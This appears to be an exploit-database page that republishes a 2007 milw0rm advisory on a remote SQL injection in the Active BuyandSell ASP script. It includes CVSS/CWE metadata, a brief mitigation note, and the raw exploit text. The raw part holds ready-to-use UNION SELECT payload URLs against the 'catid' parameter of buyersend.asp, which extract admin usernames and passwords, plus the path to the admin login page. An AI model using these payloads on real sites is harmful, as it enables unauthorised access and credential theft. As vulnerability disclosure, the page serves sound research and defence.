header-logo
Suggest Exploit
vendor:
Active BuyandSell
by:
CyberGhost
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Active BuyandSell
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Active BuyandSell Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection attacks through the 'buyersend.asp' and 'admin.asp' pages. By manipulating the 'catid' parameter, an attacker can execute arbitrary SQL queries and retrieve sensitive information such as admin credentials.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, it is recommended to regularly update the software to apply any available security patches.
Source

Exploit-DB raw data:

#Title  : Active BuyandSell Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://www.activewebsoftwares.com/demoactivebuyandsell
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8

#Vuln.

#Username : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
#Password : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins

#Admin Login : /admin.asp
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !

# milw0rm.com [2007-03-23]

Navigation

Suggest Exploit

Services By CQR